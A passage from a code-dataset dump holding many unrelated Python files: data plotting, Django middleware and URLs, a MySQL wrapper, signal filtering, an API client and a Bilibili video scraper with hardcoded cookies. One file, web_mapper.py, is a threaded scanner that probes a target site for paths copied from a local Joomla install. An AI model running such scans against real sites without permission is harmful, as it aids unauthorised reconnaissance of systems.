'D_max', 'tl']]\ndfward.columns = ['composition', 'dmax', 'tl']\n\ndf = pd.read_csv('../jobs_data/fragility.txt')\ndf['composition'] = df['job'].apply(lambda x: x.split('_')[1])\n\ndfjohnson = df.merge(dfjohnson, on=['composition'])\ndfward = df.merge(dfward, on=['composition'])\n\ndf = pd.concat([dfjohnson, dfward])\n\n# Gather Tl/T*\ndf['tg/tl'] = df['tg'].values/df['tl'].values\n\n# Take mean values for each composition\ngroups = df.groupby(['composition'])\nmean = groups.mean().add_suffix('_mean').reset_index()\nstd = groups.std().add_suffix('_std').reset_index()\nsem = groups.sem().add_suffix('_sem').reset_index()\ncount = groups.count().add_suffix('_count').reset_index()\n\n# Merge data\ndf = mean.merge(sem)\ndf = df.merge(std)\ndf = df.merge(count)\n\ngroups = df.groupby(['composition'])\n\nfig, ax = pl.subplots()\nfor i, j in groups:\n\n x = j['tg/tl_mean'].values\n y = j['dmax_mean'].values**2\n xstd = j['tg/tl_std'].values\n xsem = j['tg/tl_sem'].values\n\n ax.errorbar(\n x,\n y,\n xerr=xstd,\n ecolor='y',\n marker='8',\n linestyle='none',\n )\n\n ax.errorbar(\n x,\n y,\n xerr=xsem,\n ecolor='r',\n marker='8',\n linestyle='none',\n color=next(colors),\n label=i\n )\n\n\nax.grid()\nax.legend()\n\nax.set_xlabel(r'$T_{g}/T_{l}$')\nax.set_ylabel(r'$D_{max}^{2}$ $[mm^{2}]$')\n\nax.set_yscale('log')\n\nfig.tight_layout()\nfig.savefig('../jobs_plots/dmax_vs_tgovertl')\n\nprint(df)\npl.show()\n","sub_path":"dmax_vs_tgovertl.py","file_name":"dmax_vs_tgovertl.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351213148","text":"import Queue\nimport threading\nimport os\nimport urllib2\n\nthreads = 10\ntarget = \"http://www.test.com\"\ndirectory = \"/Users//Downloads/joomla3-1.1\"\nfilters = [\".jpg\", \".gif\", \"png\", \".css\"]\n\nos.chdir(directory)\nweb_paths = Queue.Queue()\n\nfor r,d,f in os.walk(\".\"):\n for files in f:\n remote_path = f\"{r}/{files}\"\n if remote_path.startswith(\".\"):\n remote_path = remote_path[1:]\n if os.path.splitext(files)[1] not in filters:\n web_paths.put(remote_path)\n\ndef test_remote():\n while not web_paths.empty(): \n path = web_paths.get()\n request = urllib2.Request(f\"{target}{path}\")\n try:\n response = urllib2.urlopen(request)\n content = response.read()\n print(f\"[{response.code}] => {path}\") \n response.close()\n except urllib2.HTTPError as error: \n print(f\"Failed {error.code}\")\n pass\n \nfor i in range(threads): \n print(f\"Spawning thread: {i}\")\n t = threading.Thread(target=test_remote)\n t.start()\n","sub_path":"web_mapper.py","file_name":"web_mapper.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102019307","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\n\nfrom datetime import datetime\nimport re\n\nfrom users.models import UserActivity\n\ncompiled_lists = {}\n\n\nclass LastActivity(object):\n\n def process_request(self, request):\n if not request.user.is_authenticated():\n return\n urls_module = __import__(settings.ROOT_URLCONF, {}, {}, [''])\n skip_list = getattr(urls_module, 'skip_last_activity_date', None)\n skipped_path = request.path\n if skipped_path.startswith('/'):\n skipped_path = skipped_path[1:]\n if skip_list is not None:\n for expression in skip_list:\n compiled_version = None\n if not compiled_lists.has_key(expression):\n compiled_lists[expression] = re.compile(expression)\n compiled_version = compiled_lists[expression]\n if compiled_version.search(skipped_path):\n return\n activity = None\n try:\n activity = request.user.useractivity\n except:\n activity = UserActivity()\n activity.user = request.user\n activity.last_activity_date = datetime.now()\n activity.last_activity_ip = request.META['REMOTE_ADDR']\n activity.save()\n activity.last_activity_date = datetime.now()\n activity.last_activity_ip = request.META['REMOTE_ADDR']\n activity.save()\n","sub_path":"modules/users/middleware/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"418467321","text":"from django.conf.urls import url\n\n# Import Django authentication views\nfrom django.contrib.auth import views as loginViews\n\nfrom .views import DashboardView\n\nurlpatterns = [\n\n # login / logout urls\n url(r'^login/$',\n loginViews.login,\n name='login'),\n\n url(r'^logout/$',\n loginViews.logout,\n name='logout'),\n\n url(r'^logout-then-login/$',\n loginViews.logout_then_login,\n name='logout_then_login'),\n\n url(r'^dashboard/$',\n \tDashboardView.as_view(),\n \tname='dashboard'),\n\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340708313","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\n\n\ndef open_task(name):\n \"\"\"\n Открытие окна с заданием\n \n Параметры:\n name -- имя файла с расширением\n\n \"\"\" \n root = tk.Tk()\n\n # Создаем рабочую область\n frame = tk.Frame(root)\n frame.grid()\n\n # Добавим изображение\n image = Image.open(name)\n \n # Узнаём размер изображения и подгоняем окно под него\n (width, height) = image.size\n canvas = tk.Canvas(root, height=height, width=width)\n \n photo = ImageTk.PhotoImage(image)\n image = canvas.create_image(0, 0, anchor='nw',image=photo)\n canvas.grid(row=2,column=1)\n \n # Заголовок окна и главный цикл\n root.title(\"Задание\")\n root.mainloop()\n","sub_path":"Задание 1/opentaskmodule.py","file_name":"opentaskmodule.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497895160","text":"import sys\nsys.stdin = open ('5174.txt', 'r')\n\n\ndef find(a):\n global cnt\n\n if a:\n find(tree[a][0])\n find(tree[a][1])\n cnt += 1\n\nT = int(input())\n\nfor tc in range(T):\n e, n = list(map(int, input().split()))\n data = list(map(int, input().split()))\n\n m = max(data)\n\n tree = [[0] * 2 for _ in range(m+1)]\n\n\n for i in range(len(data) // 2):\n parent, child = data[i * 2], data[i * 2 + 1]\n if not tree[parent][0]:\n tree[parent][0] = child\n else:\n tree[parent][1] = child\n\n cnt = 0\n find(n)\n\n\n print('#{} {}' .format(tc+1, cnt))\n\n","sub_path":"Algorithm/190910/5174_subtree.py","file_name":"5174_subtree.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"410226382","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Han\"\n__email__ = \"liuhan132@foxmail.com\"\n\n\nimport argparse\nfrom tqdm import tqdm\nimport torch\nimport torch.nn\nimport torch.multiprocessing\nimport logging\nfrom game.dataset_reader import DocPTReader\nfrom utils.functions import set_seed\nfrom utils.config import init_logging, read_config\nfrom game.dataset_reader import load_docs_rep\n\nlogger = logging.getLogger(__name__)\n\n\ndef main(config_path, out_infix, slot):\n logger.info('loading config file...')\n game_config = read_config(config_path, out_infix)\n\n # set multi-processing: bugs in `list(dataloader)`\n # see more on `https://github.com/pytorch/pytorch/issues/973`\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n # set random seed\n set_seed(game_config['global']['random_seed'])\n\n logger.info('reading dataset...')\n dataset = DocPTReader(game_config)\n\n # training arguments\n batch_size = 1\n num_workers = 5\n test_iters = 500\n\n # dataset loader\n batch_test_data = dataset.get_dataset_test_slot(slot, batch_size, num_workers, test_iters)\n docs_name = dataset.doc_reader.get_all_names()\n\n logger.info('start testing...')\n\n with torch.no_grad():\n test_mrr = eval_on_rep(docs_name, batch_test_data)\n logger.info(\"test_all_mrr=%.2f%%\" % test_mrr)\n logger.info('finished.')\n\n\ndef eval_on_rep(docs_name, dataloader):\n docs_rep = load_docs_rep('data/doc_rep/pt/dialog_doc_pt_rep.pt')\n\n mrr = []\n\n for batch in tqdm(dataloader, desc='Testing...'):\n _, _, batch_ground_truth_idx, batch_cand_doc_names = batch\n ground_truth_idx = batch_ground_truth_idx[0].item()\n cand_doc_names = batch_cand_doc_names[0]\n\n cand_idx = [docs_name.index(name) for name in cand_doc_names]\n tar_idx = cand_idx[ground_truth_idx]\n\n cand_docs_rep = docs_rep[cand_idx, 0, 400:]\n tar_rep = docs_rep[tar_idx, 0, :400]\n\n cand_prob = torch.mm(tar_rep.unsqueeze(0), cand_docs_rep.transpose(0, 1)).squeeze(0)\n cand_prob_softmax = torch.softmax(cand_prob, dim=-1)\n\n sort_prob, sort_idx = torch.sort(cand_prob_softmax, dim=-1, descending=True)\n cur_mrr = 1.0 / (sort_idx.tolist().index(ground_truth_idx) + 1)\n mrr.append(cur_mrr)\n\n return sum(mrr) * 1.0 / len(mrr)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--out', type=str, default='default', help='output path infix')\n parser.add_argument('--slot', type=str, default='directed_by', help='output path infix')\n args = parser.parse_args()\n\n out_infix = args.out\n\n init_logging(out_infix=out_infix)\n main('config/game_config.yaml', out_infix=out_infix, slot=args.slot)","sub_path":"tests/test_docs_rep.py","file_name":"test_docs_rep.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619054490","text":"import time\n\nclass TimeModel:\n def __init__(self):\n self.days = [\"Maandag\", \"Dinsdag\", \"Woensdag\", \"Donderdag\", \"Vrijdag\", \"Zaterdag\", \"Zondag\"]\n self.months = [\"januari\", \"februari\", \"maart\", \"april\", \"mei\", \"juni\", \"juli\", \"augustus\", \"september\", \"oktober\", \"november\", \"december\"]\n\n def get_current_second(self):\n t = time.time()\n local = str(time.localtime(t).tm_sec)\n if(len(local) == 1):\n local = \"0\" + local\n\n return local\n\n def get_current_date(self):\n t = time.time()\n local = time.localtime(t)\n return self.days[local.tm_wday] + \", \" + str(local.tm_mday) + \" \" + self.months[local.tm_mon - 1] + \" \" + str(local.tm_year)\n\n def get_current_time(self):\n t = time.time()\n local = time.localtime(t)\n hour = str(local.tm_hour)\n minute = str(local.tm_min)\n\n if(len(hour) == 1):\n hour = \"0\" + hour\n\n if(len(minute) == 1):\n minute = \"0\" + minute\n\n return hour + \":\" + minute\n\n def get_temperature(self):\n humidity, temperature = Adafruit_DHT.read(self.sensor, 4)\n return temperature","sub_path":"bin/models/timemodel.py","file_name":"timemodel.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"383700419","text":"import mysql.connector\nfrom mysql.connector.errors import Error\n\n\nclass MySQL:\n def __init__(self, db_config):\n self.db_config = db_config\n\n def create_connection(self):\n try:\n self.conn = mysql.connector.connect(**self.db_config)\n self.cursor = self.conn.cursor(dictionary=True)\n except Error as e:\n\t print(e)\n \n return self.cursor\n \n def query(self, *args):\n try:\n self.cursor.execute(*args)\n except Error as e:\n print(e)\n self.commit()\n self.close()\n\n def select(self, *args):\n try:\n self.cursor.execute(*args)\n res = self.cursor.fetchall()\n self.close()\n \n return res\n except Error as e:\n print(e)\n self.close()\n\n def commit(self):\n self.conn.commit()\n\n def close(self):\n self.cursor.close()\n self.conn.close()","sub_path":"taxi-react-v2/server/mysql_wrapper.py","file_name":"mysql_wrapper.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"141209028","text":"from atlas_client.http.http_resource import HttpResource\nfrom atlas_client.resources.organizations.programmatic_api_keys.programmatic_api_keys import ProgrammaticAPIKeysResource\n\n\nclass _SingleOrganizationResource(HttpResource):\n def programmatic_api_keys(self) -> ProgrammaticAPIKeysResource:\n path = \"apiKeys\"\n return self.context.sub_resource(_class=ProgrammaticAPIKeysResource, path=path)\n\n def get(self) -> dict:\n response = self.context.request(method=\"GET\")\n response.raise_for_status()\n return response.json()\n\n def update(self, new_name: str) -> dict:\n _json = {\n \"name\": new_name\n }\n response = self.context.request(method=\"PATCH\",\n json=_json)\n response.raise_for_status()\n return response.json()\n\n def delete(self) -> None:\n response = self.context.request(method=\"DELETE\")\n response.raise_for_status()\n\n\nclass OrganizationResource(HttpResource):\n def with_id(self, org_id: str) -> _SingleOrganizationResource:\n path = org_id\n return self.context.sub_resource(_class=_SingleOrganizationResource, path=path)\n\n def get(self) -> dict:\n response = self.context.request(method=\"GET\")\n response.raise_for_status()\n return response.json()\n\n def create(self, name: str) -> dict:\n _json = {\n \"name\": name\n }\n response = self.context.request(method=\"POST\",\n json=_json)\n response.raise_for_status()\n return response.json()\n","sub_path":"atlas/src/atlas_client/resources/organizations/organizations.py","file_name":"organizations.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"347539679","text":"from rest_framework.permissions import DjangoModelPermissions, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import ModelSerializer\nfrom rest_framework.views import APIView\n\nfrom curation_portal.models import Project\n\n\nclass ProjectSerializer(ModelSerializer):\n class Meta:\n model = Project\n fields = (\"id\", \"name\")\n\n\nclass CreateProjectView(APIView):\n permission_classes = (IsAuthenticated, DjangoModelPermissions)\n\n queryset = Project.objects.none() # required for DjangoModelPermissions\n\n def post(self, request):\n serializer = ProjectSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n project = serializer.save(created_by=request.user)\n project.owners.set([request.user])\n return Response(serializer.data)\n","sub_path":"curation_portal/views/project_admin.py","file_name":"project_admin.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382074032","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.signal as signal\nimport scipy.io.wavfile as wav\nfrom scipy.fftpack import fft, ifft\nfrom scipy.ndimage.interpolation import shift\n\n# Reading signal\nFs, sound = wav.read('xuhric00.wav')\n\nprint('Sampling frequency: %d Hz' %Fs)\nprint('Length: %d samples' %sound.size)\nprint('Length: %d s' %(sound.size/Fs))\n\n# Fourier transformation of wav signal\ndft = fft(sound)\n\n# Getting modules\nmoduls = np.absolute(dft)\n\n# Plotting\nplt.plot(moduls[:(Fs//2)])\nplt.xlabel('f [Hz]')\nplt.ylabel('|X(x)|')\nplt.show()\n\n# Finding maximum\nprint('Maximum is on frequency: %d Hz' %np.argmax(moduls))\n\n# b and a values of filter\na = [1., 0.2289, 0.4662]\nb = [0.2324, -0.4112, 0.2324]\n\n# Finding zeroes and poles of the filter\nzeroes, poles, _ = signal.tf2zpk(b, a)\n\n# Plotting zeroes and poles\nplt.scatter(zeroes.real, zeroes.imag, marker='o', label='zeroes')\nplt.scatter(poles.real, poles.imag, marker='x', label='poles')\nplt.gca().add_patch(plt.Circle((0,0), radius=1., color='lightsteelblue', fc='none'))\nplt.axis('scaled')\nplt.legend(scatterpoints=1)\nplt.xlabel('real part')\nplt.ylabel('imaginary part')\nplt.show()\n\n# Finding impuls response of a filter and normed frequency\nnormf, freqresponse = signal.freqz(b, a)\n\n# Calculating absolute frequency\nf = Fs * normf / (2*np.pi)\n\n# Plotting \nplt.plot(f, np.abs(freqresponse))\nplt.xlabel('f [Hz]')\nplt.ylabel('|H(z)|')\nplt.show()\n\n# Filtering our signal\ny = signal.lfilter(b, a, sound)\n\n# Fourier transformation over filtered signal\ndft = fft(y)\n\n# Getting modules\nmoduls = np.absolute(dft)\n\n# Plotting\nplt.plot(moduls[:(Fs//2)])\nplt.xlabel('f [Hz]')\nplt.ylabel('|Y(x)|')\nplt.show()\n\n# Finding maximum \nprint('Maximum is on frequency: %d Hz' %np.argmax(moduls))\n\n# Finding autocorrelated coefficients\nr = np.array([])\n\nfor k in range(-50, 51):\n r = np.append(r, np.sum((sound/sound.size)*shift(sound, k, cval = 0)))\n\nplt.plot(r)\nplt.show()\n\nprint('Value of coefficient R[10] = %.2f' %r[60])\n\n# Creating histogram\nhist, xedges, yedges = np.histogram2d(sound, shift(sound, 10, cval=0),\n 32, normed=True,\n range=[[-Fs, Fs], [-Fs, Fs]])\n\nplt.imshow(hist, interpolation='nearest', origin='low',\n extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]])\nplt.colorbar()\n\nplt.show()\n\n# Check that integral equals 1\nsquareSize = (xedges[1]-xedges[0])*(yedges[1]-yedges[0])\nintegral = squareSize * np.sum(hist)\nprint('Total volume of 2D histogram: %.2f' %integral)\n\n# Finding autocorrelated coefficient\nx = np.linspace(-16000, 16000, num=32)\nx = np.tile(x, (32, 1))\nr = np.sum(x * x.transpose() * hist) * squareSize\nprint('Histogram calculated R[10] = %.2f' %r)\n","sub_path":"2BIT/ISS/xuhric00.py","file_name":"xuhric00.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102922584","text":"from enroll.categoryPush import CategoryPush\nfrom browser.chrome import Chrome\n\n\n# 역시 이름이 맘에 안 들지만,\n# is_p 가 True 면 사이트에서 얻은 카테고리 정보를 csv파일로 저장하는 메소드(push_2_csv())를 호출하고,\n# False면 csv파일을 읽어 category, history table 을 채우는 메소드 호출한다.\ndef do_using_csv(is_p_2_csv):\n c = CategoryPush(url, ch, name)\n if is_p_2_csv:\n c.push_2_csv()\n else:\n c.push_2_db()\n return\n\n\n# 위의 push_2_csv()메소드를 수행하기 전에, 콘솔 창으로 확인하는 메소드. 카테고리 정보를 csv로 저장하냐, 콘솔창을 확인하냐의 차이만 있다.\ndef test_in_console():\n # 크롬 창을 최대화\n ch.driver.maximize_window()\n try:\n c = CategoryPush(url, ch, name)\n print(c.site_id)\n\n # 이 패키지 전체에서 핵심이 되는 메소드. 자세한 설명은 categoryPush.py 에서\n c.drive_next_cate('', '', 1)\n\n # 콘솔창으로 결과를 출력\n print('-'*50)\n # 카테고리의 이름들. ex) outer>jumper, women>top>반팔 등\n for n in c.cate_names:\n print(n)\n print('-'*50)\n # 카테고리의 url 출력\n for u in c.urls:\n print(u)\n finally:\n ch.driver.close()\n return\n\n\n# [전체과정]\n# 크롬 브라우저를 실행\nch = Chrome()\n\n# 원하는 사이트의 url과 이름을 입력\nurl = 'https://daltt.co.kr/'\nname = 'daltt'\n\n# 해당 사이트로 브라우저 이동\nch.move(url)\n\ntry:\n # test_in_console()\n is_2_csv = False\n # do_using_csv 에 관한 설명은 위에서 했으니 생략\n do_using_csv(is_2_csv)\nfinally:\n ch.driver.close()\n pass\n\n# url = 'https://daltt.co.kr/'\n# name = 'daltt'\n# url = 'https://store-kr.uniqlo.com/'\n# name = 'uniqlo'\n# url = 'http://leehee.co.kr/'\n# name = 'leehee'\n# url = 'https://store.musinsa.com/app/'\n# name = 'musinsa'\n\n\n\n\n\n\n","sub_path":"common/enroll/enrollSite.py","file_name":"enrollSite.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112346092","text":"#!/usr/bin/python3\n\"\"\"\n 6-square.py\n Module that defines a Square and return square size and coordinates\n Including Getters and Setters\n Including Method to calculate the Square's area\n Including Method to print the Square based on coordinates\n\"\"\"\n\n\nclass Square:\n \"\"\"\n Represents a class called Square with:\n private instance attribute called size\n private instance attribute called position\n \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initialization of the private instance attributes\"\"\"\n self.size = size\n self.position = position\n\n @property\n def size(self):\n \"\"\"Getter property to get the size of the Square\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"Set the size of the Square\n\n Args:\n value (int): New size of the Square\n\n Note:\n If size is not an integer, a TypeError exception is raised\n Else If size is negative, a ValueError exception is raised\n Otherwise, Successful Set\n \"\"\"\n if type(value) == int:\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n \"\"\"Getter property to get the coordinates of the Square\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Set the coordinates of the Square\n\n Args:\n value (tuple): New coordinates of the Square\n\n Note:\n If position contains more than 2 elements, a TypeError\n exception is raised\n Else If one of the position elements is negative, a TypeError\n exception is raised\n Else if one of the position elements is not integer, a TypeError\n exception is raised\n Otherwise, Successful Set\n \"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif any(not isinstance(num, int) for num in value):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif any(num < 0 for num in value):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n \"\"\"Function that returns the area of the square\"\"\"\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Function that prints the square based on coordinates\n\n Note:\n If size is zero, print empty line\n Otherwise:\n print matrix with # character of same Square's size\n with leading spaces based on coordinates\n \"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n for j in range(self.__position[0]):\n print(\" \", end=\"\")\n for k in range(self.__size):\n print(\"#\", end=\"\")\n print()\n","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169713398","text":"import requests\nimport re\nimport time\nimport json\n\n\nclass BlilibliliSpider(object):\n def __init__(self):\n self.headers={\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n # \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"zh-CN,zh;q=0.9\",\n \"cache-control\": \"max-age=0\",\n \"cookie\": \"fingerprint=bd1b6509a35f4e22e5bf2537271fbea9; buvid_fp=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; buvid_fp_plain=C072413D-321F-4708-A6EC-49A7372D080B185000infoc; CURRENT_FNVAL=80; _uuid=8F83D8E1-5AA8-52A8-E681-ABB6DCE25A2C47038infoc; buvid3=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; blackside_state=1; rpdid=|(umR~lmRlkm0J'uY|JYmk)l); LIVE_BUVID=AUTO1216146669857273; CURRENT_QUALITY=64; fingerprint=bd1b6509a35f4e22e5bf2537271fbea9; buvid_fp=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; buvid_fp_plain=C072413D-321F-4708-A6EC-49A7372D080B185000infoc; sid=jz5uhvmb; PVID=2\",\n \"sec-fetch-dest\": \"document\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"none\",\n \"sec-fetch-user\": \"?1\",\n \"referer\": \"https://www.bilibili.com/video/BV1SK4y1m7Ct\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\"\n }\n self.filename='/home/tarena/bliliblili'\n self.url='https://api.bilibili.com/x/web-interface/popular?ps=20&pn={}'\n def parse_one_page(self):\n for pn in range(1,3):\n url=self.url.format(pn)\n # url='https://api.bilibili.com/x/web-interface/popular?ps=20&pn=2'\n data=requests.get(url=url,headers=self.headers).text\n # data.decode('utf8')\n\n print(data)\n data = json.loads(data)['data']['list']\n\n L={}\n for info in data:\n L['title']=info['title']\n L['bvid']=info['bvid']\n L['tname']=info['tname']\n print(L)\n self.parse_two_page(L['bvid'],L['title'])\n time.sleep(6)\n\n def parse_two_page(self,bvid,title):\n url='https://www.bilibili.com/video/'+bvid\n html=requests.get(url=url,headers=self.headers).text\n bds = 'window.__playinfo__=(.*?)'\n pattern = re.compile(bds, re.S)\n data = pattern.findall(html)[0]\n data = json.loads(data)\n data=data['data']['dash']['audio'][0]\n video_url=data['base_url']\n voice_url=data['backup_url'][0]\n print(video_url)\n print(voice_url)\n\n\n # self.save_data(video_url,voice_url,title)\n\n def save_data(self,video_url,voice_url,title):\n video=requests.get(url=video_url,headers=self.headers).content\n with open(self.filename+title+'.mp4','wb')as f:\n print(video)\n f.write(video)\n print('视频下载完成')\n video=requests.get(url=voice_url,headers=self.headers).content\n # html=video.decode('utf8')\n with open(self.filename+title+'.mp3','wb')as f:\n f.write(video)\n print('声音下载完成')\n\n\n\n\n\n def main(self):\n self.parse_one_page()\n\nif __name__ == '__main__':\n spider=BlilibliliSpider()\n spider.main()","sub_path":"bliliblili_spider.py","file_name":"bliliblili_spider.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"633103919","text":"#!/usr/bin/env python\n\nimport rospy\nfrom mongodb_store.message_store import MessageStoreProxy\nfrom bayes_people_tracker.msg import PeopleTracker\nfrom mdl_people_tracker.msg import MdlPeopleTrackerArray, MdlPeopleTracker\nfrom upper_body_detector.msg import UpperBodyDetector\nfrom bayes_people_tracker_logging.msg import Logging\nimport geometry_msgs.msg\nimport message_filters\nfrom camera_calibration.approxsync import ApproximateSynchronizer\nimport tf\n\n\nclass SaveLocations():\n def __init__(self):\n rospy.logdebug(\"Intialising logging\")\n self.robot_pose = geometry_msgs.msg.Pose()\n self.tfl = tf.TransformListener()\n self.dataset_name = \"locations\"\n self.msg_store = MessageStoreProxy(collection=\"people_perception\")\n locations = message_filters.Subscriber(\n \"/people_tracker/positions\",\n PeopleTracker,\n )\n people = message_filters.Subscriber(\n \"/mdl_people_tracker/people_array\",\n MdlPeopleTrackerArray,\n )\n upper = message_filters.Subscriber(\n \"/upper_body_detector/detections\",\n UpperBodyDetector,\n )\n rospy.Subscriber(\n \"/robot_pose\",\n geometry_msgs.msg.Pose,\n self.pose_callback,\n None,\n 10\n )\n ts = ApproximateSynchronizer(\n 0.5,\n [locations, people, upper],\n 10\n )\n ts.registerCallback(self.people_callback)\n\n def transform(self, source_frame, target_frame, time):\n rospy.logdebug(\n \"Looking up transform: %s -> %s\",\n source_frame,\n target_frame\n )\n transform = geometry_msgs.msg.Transform()\n if self.tfl.frameExists(source_frame[1:]) \\\n and self.tfl.frameExists(target_frame[1:]):\n try:\n self.tfl.waitForTransform(\n target_frame,\n source_frame,\n time,\n rospy.Duration(0.1)\n )\n translation, rotation = self.tfl.lookupTransform(\n target_frame,\n source_frame,\n time\n )\n transform.translation.x = translation[0]\n transform.translation.y = translation[1]\n transform.translation.z = translation[2]\n transform.rotation.x = rotation[0]\n transform.rotation.y = rotation[1]\n transform.rotation.z = rotation[2]\n transform.rotation.w = rotation[3]\n except (\n tf.Exception,\n tf.ConnectivityException,\n tf.LookupException,\n tf.ExtrapolationException\n ) as e:\n rospy.logwarn(e)\n return transform\n\n def people_callback(self, pl, pt, up):\n if len(pl.distances) == 0:\n return\n meta = {}\n meta[\"people\"] = self.dataset_name\n rospy.logdebug(\n \"Person detected. \"\n \"Logging to people_perception collection.\"\n )\n insert = Logging()\n insert.header = pl.header\n insert.uuids = pl.uuids\n insert.people = pl.poses\n insert.robot = self.robot_pose\n insert.people_tracker = pl\n insert.mdl_people_tracker = pt.people\n insert.upper_body_detections = up\n insert.target_frame = self.transform(\n pt.header.frame_id,\n pl.header.frame_id,\n pt.header.stamp\n )\n if pl.header.frame_id == '/base_link':\n insert.base_link = insert.target_frame\n else:\n insert.base_link = self.transform(\n pt.header.frame_id,\n '/base_link',\n pt.header.stamp\n )\n self.msg_store.insert(insert, meta)\n\n def pose_callback(self, pose):\n self.robot_pose = pose\n\nif __name__ == '__main__':\n rospy.init_node('save_people_locations')\n sl = SaveLocations()\n rospy.spin()\n","sub_path":"bayes_people_tracker_logging/scripts/save_locations.py","file_name":"save_locations.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243003672","text":"import requests\n\nfrom utils.ml_api_request import MlApiRequest\n\n\nclass MlApiStyleRequest(MlApiRequest):\n def __init__(self):\n super().__init__(resource='style')\n\n def post(self, description):\n r = requests.post(\n self.url,\n headers=self.headers,\n json={'description': description}\n )\n return r.json()\n\n def put(self, instance_id, description):\n r = requests.put(\n f'{self.url}/{instance_id}',\n headers=self.headers,\n json={'description': description}\n )\n print(r.json())\n return r.json()\n","sub_path":"client_api/style/ml_api.py","file_name":"ml_api.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"410655689","text":"import logging\n\nfrom django import forms\nfrom django.apps import apps\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom .utils import error_utils\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass SchemaUploadForm(forms.Form):\n \"\"\"\n A form for uploading a data schema json file.\n \"\"\"\n\n schema = forms.FileField()\n\n\nclass TypedChoiceField2(forms.TypedChoiceField):\n\n def to_python(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError(\n message='Must choose something',\n code='invalid'\n )\n else:\n return None\n else:\n return super().to_python(value)\n\n\nclass ChoiceField2(forms.ChoiceField):\n\n def to_python(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError(\n message='Must choose something',\n code='invalid'\n )\n else:\n return None\n else:\n return super().to_python(value)\n\n\nclass InterfaceForm(forms.Form):\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n https://code.djangoproject.com/wiki/CookBookNewFormsDynamicFields\n \"\"\"\n\n # Try to get the Interface model\n try:\n Interface = apps.get_model('tdsl', 'Interface')\n except 